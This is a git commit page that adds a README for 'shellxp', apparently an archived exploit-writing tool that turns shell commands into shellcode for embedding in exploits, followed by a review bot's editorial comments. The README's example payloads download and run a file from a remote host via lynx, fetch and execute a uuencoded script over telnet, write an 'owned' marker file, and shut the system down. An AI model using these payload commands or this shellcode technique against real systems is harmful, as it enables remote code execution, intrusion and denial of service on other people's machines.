| author | SkyperTHC | 2026-03-03 06:28:55 +0000 |
|---|---|---|
| committer | SkyperTHC | 2026-03-03 06:28:55 +0000 |
| commit | 5d3573ef7a109ee70416fe94db098fe6a769a798 (patch) | |
| tree | dc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /other/shell/README | |
| parent | c6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff) | |
packetstorm sync
Diffstat (limited to 'other/shell/README')
| -rw-r--r-- | other/shell/README | 38 |
1 files changed, 38 insertions, 0 deletions
diff --git a/other/shell/README b/other/shell/README new file mode 100644 index 0000000..b6fbeaa --- /dev/null +++ b/other/shell/README | |||
| @@ -0,0 +1,38 @@ | |||
| 1 | |||
| 2 | gcc -o shellxp shellxp.c | ||
| 3 | |||
| 4 | ./shellxp commands ... | ||
| 5 | |||
| 6 | or to exec the generated shellcode | ||
| 7 | |||
| 8 | ./shellxp exec commands ... | ||
| 9 | |||
| 10 | |||
| 11 | either rip the sc_build routine into your exploits to directly create the | ||
| 12 | shellcode on the fly, or prepare it. | ||
| 13 | |||
| 14 | some examples: | ||
| 15 | |||
| 16 | ./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a" | ||
| 17 | ./shellxp /bin/sh -c "echo haha > /tmp/owned" | ||
| 18 | ./shellxp /sbin/shutdown -h now | ||
| 19 | |||
| 20 | or especially fancy ;-) | ||
| 21 | |||
| 22 | ./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh" | ||
| 23 | |||
| 24 | (where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file) | ||
| 25 | modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-) | ||
| 26 | |||
| 27 | (imagine some other fancy stuff in here :-) | ||
| 28 | ... | ||
| 29 | |||
| 30 | -scut/teso. | ||
| 31 | |||
| 32 | |||
| 33 | to modify the shellcode, use: | ||
| 34 | |||
| 35 | gcc -o shellcode shellcode.c sc.s | ||
| 36 | ./shellcode <-- will dump the code | ||
| 37 | ./shellcode foo <-- will dump and run the code | ||
| 38 | |||
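Review bot: The README never says what shellxp produces or which platform it targets. Lines 2-8 go straight from the build command to `./shellxp commands ...` and `./shellxp exec commands ...` without stating the output format or the architecture and OS of the generated shellcode, and line 11 refers to the `sc_build` routine without naming the file it lives in. A short opening paragraph covering those three points would let the file stand on its own. Line 6 says the `exec` form executes the generated shellcode; it should state where that happens, because a reader who pastes one of the examples from lines 16-18 after `exec` (for instance `/sbin/shutdown -h now`) needs to know what will run. Minor points: "executeable" (line 24) and "appropiate" (line 25) are misspelled, line 28 is a bare `...` placeholder, and the section at lines 33-37 builds from `shellcode.c` and `sc.s`, which this diffstat (limited to the README) does not show, so confirm they are part of the same sync. If the file is meant to stay an unmodified copy of the archived original, say so in the commit message rather than changing the text.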
